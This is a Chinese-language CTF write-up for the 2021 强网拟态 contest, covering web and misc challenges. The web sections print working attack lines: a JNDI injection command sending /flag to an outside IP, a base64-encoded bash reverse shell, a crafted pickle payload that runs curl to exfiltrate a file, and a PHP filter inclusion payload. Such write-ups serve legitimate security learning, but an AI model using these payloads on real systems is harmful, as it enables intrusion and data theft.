0%

强网拟态 2021

记录一下

web

zerocalc

直接e=readFile('/flag')

Jack-Shiro

题目给了pom.xml

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
<parent>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-parent</artifactId>
<version>1.5.22.RELEASE</version>
<relativePath/>
</parent>
<modelVersion>4.0.0</modelVersion>
<artifactId>ctf</artifactId>
<build>
<plugins>
<plugin>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-maven-plugin</artifactId>
<configuration>
<fork>true</fork>
<mainClass>com.ctf.Application</mainClass>
</configuration>
<executions>
<execution>
<goals>
<goal>repackage</goal>
</goals>
</execution>
</executions>
</plugin>
</plugins>
</build>
<dependencies>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-web</artifactId>
</dependency>
<dependency>
<groupId>org.apache.shiro</groupId>
<artifactId>shiro-web</artifactId>
<version>1.5.1</version>
</dependency>
<dependency>
<groupId>org.apache.shiro</groupId>
<artifactId>shiro-spring</artifactId>
<version>1.5.1</version>
</dependency>
<dependency>
<groupId>ch.qos.logback</groupId>
<artifactId>logback-core</artifactId>
<version>1.2.1</version>
</dependency>
<dependency>
<groupId>commons-collections</groupId>
<artifactId>commons-collections</artifactId>
<version>3.2.1</version>
</dependency>
</dependencies>
</project>

红名谷原题,先启动这个

1
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "curl http://134.175.168.213:1234 -F file=@/flag"

或者使用base64加密的方式

1
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtYyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xMzQuMTc1LjE2OC4yMTMvMTIzNCAwPiYxIg==}|{base64,-d}|{bash,-i}" -A 134.175.168.213

rmi部分复制一下即可

1
2
Target environment(Build in JDK whose trustURLCodebase is false and have Tomcat 8+ or SpringBoot 1.2.x+ in classpath):
rmi://134.175.168.213:1099/ecqgav

image-20211025143246371

ezPickle

app.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
from flask import Flask,request,session,render_template_string,url_for,redirect
import pickle
import io
import sys
import base64
import random
import subprocess
from config import notadmin

app = Flask(__name__)
class RestrictedUnpickler(pickle.Unpickler):
def find_class(self, module, name):
if module in ['config'] and "__" not in name:
return getattr(sys.modules[module], name)
raise pickle.UnpicklingError("'%s.%s' not allowed" % (module, name))

def restricted_loads(s):
"""Helper function analogous to pickle.loads()."""
return RestrictedUnpickler(io.BytesIO(s)).load()

@app.route('/')
def index():
info = request.args.get('name', '')
if info is not '':
x = base64.b64decode(info)
User = restricted_loads(x)
return render_template_string('Hello')

if __name__ == '__main__':
app.run(host='0.0.0.0', debug=True, port=5000)

config.py

1
2
3
4
5
6
notadmin={"admin":"no"}

def backdoor(cmd):
if notadmin["admin"]=="yes":
s=''.join(cmd)
eval(s)

这里给了个过滤,需要是config下的属性,并且不能有下划线

1
if module in ['config'] and "__" not in name

只要把notadmin["admin"]赋值为yes即可,这里用pker构造下

1
2
3
4
backdoor =  GLOBAL("config","backdoor")
notadmin = GLOBAL("config","notadmin")
notadmin["admin"] = "yes"
backdoor("__import__('os').system('curl -F file=@/flag http://134.175.168.213:1234')")

脚本如下

1
2
3
4
5
import base64
import requests
opc = b'cconfig\nbackdoor\np0\n0cconfig\nnotadmin\np1\n0g1\nS\'admin\'\nS\'yes\'\nsg0\n(S\'__import__(\\\'os\\\').system(\\\'curl -F file=@/flag http://134.175.168.213:1234\\\')\'\ntR.'
payload = str(base64.b64encode(opc),'utf-8')
requests.get("http://124.71.183.254:32769/?name="+payload)

在监听处即可获取flag

EasyFilter

actionw可以写文件进files目录下,文件名为随机,并且内容经过base64加密,为r的时候有个文件包含,经过测试

1
php://filter/resource=convert.base64-decode/../76f58af80b

这样的形式可以使得php filter的语法正确,触发base64过滤器,于是先写一个cat /flagphp代码,再文件包含即可

payload

1
2
/?action=w&c=<?php%20system('cat+/flag');?>
/?action=r&r=convert.base64-decode/../76f58af80b

Give_me_your_0day

题目打开是typecho的安装界面,在给的附件中也可以看到,在install里面其中的dbadapter参数可以指定数据库的类型,可以指定ip和端口

这里想到起一个mysql_fake_server

然后改一下config fileread的用户名去读一下/flag即可

1
2
3
4
5
6
{
"fileread":{
"win_ini":"c:\\windows\\win.ini",
"win_hosts":"c:\\windows\\system32\\drivers\\etc\\hosts",
"win":"c:\\windows\\",
"root":"/flag"

misc

bar

找个网站https://www.bejson.com/convert/gif2frame/gif转为图片

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
from PIL import Image
string = ['100010100', '101001000', '101000100', '101000010', '100101000', '100100100', '100100010', '101010000', '100010010', '100001010', '110101000', '110100100', '110100010', '110010100', '110010010', '110001010', '101101000', '101100100', '101100010', '100110100', '100011010', '101011000', '101001100', '101000110', '100101100', '100010110', '110110100', '110110010', '110101100', '110100110', '110010110', '110011010', '101101100', '101100110', '100110110', '100111010', '100101110']
number = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '-']
qwe = ''
result = ''
code = []
for i in range(1, 335):
img = Image.open('images/output-%s.png' % str(i))
if img.getpixel((9,9))[0] == 0:
result += '1'
elif img.getpixel((3,3))[0] == 255:
result += '0'
else:
result += '?'
for i in range(0,len(result),9):
if result[i:i+9] in string:
qwe += number[string.index(result[i:i+9])]
else:
qwe += '?'
code.append(result[i:i+9])
print(qwe.lower())
print(code)

输出

1
2
????f0c62db973684dbda896f9c5f6d962????
['1010?111?', '100?0?111', '10?00011?', '101011110', '000000000', '000000000', '101011110', '1']

到这个网站http://tiaoxingma.wiicha.com/

image-20211025202032941

获取到后面两位校验位是110010110 101001100,根据编码表查到为um

1
flag{f0c62db973684dbda896f9c5f6d962um}

BlueWhale

追踪第5TCP流发现密码th1sIsThEpassw0rD

![image-20211026093418015](F:/picture/拟态 2021/image-20211026093418015.png)

把密码写进password.txt文件,用win压缩下,用ARCHPR解密得到!2b$3&Ec

然后用lsb隐写获取到flag

WeirdPhoto

把图片拉进010编辑器会发现报CRC的错误,这是因为修改了高宽,却没有修改CRC,导致读取报错

![image-20211026144014943](F:/picture/拟态 2021/image-20211026144014943.png)

用脚本爆破一下图片的高宽,修改widheicrc32

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
import struct
import zlib

def hexStr2bytes(s):
b = b""
for i in range(0,len(s),2):
temp = s[i:i+2]
b +=struct.pack("B",int(temp,16))
return b

str1="49484452"
str2="0806000000"
bytes1=hexStr2bytes(str1)
bytes2=hexStr2bytes(str2)

wid,hei = 0x3e8, 0x1f4
crc32 = "0x9e916964"

for w in range(wid,wid+2000):
for h in range(hei,hei+2000):
width = hex(w)[2:].rjust(8,'0')
height = hex(h)[2:].rjust(8,'0')
bytes_temp=hexStr2bytes(width+height)
if eval(hex(zlib.crc32(bytes1+bytes_temp+bytes2))) == eval(crc32):
print(hex(w),hex(h))

输出获取到0x58c 0x1f4,修改之后获取到图片的字符串TIEWOFTHSAEOUIITNRBCOSHSTSAN

发现是栅栏密码THISISTHEANSWERTOOBSFUCATION,解压后发现是个没有文件头的pdf文件,加上文件头25 50 44 46,转为pdf文件之后用wbs43open一把梭

mirror

010editor打开发现文件最后是一个png头,并且每16位倒着

用脚本先反向读取,然后每16位反向写入一次

1
2
3
4
5
with open('full.png','rb') as f:
s = f.read()[::-1]
with open('flag.png','wb') as g:
for i in range(0, len(s), 16):
g.write(s[i:i+16][::-1])

然后flag.png拉进010crc错误,用上面的脚本跑一下('0x922', '0x505')

然后用盲水印工具转一下

1
python3 bwmforpy3.py decode flag.png full.png 1.png

然后左上角即是flag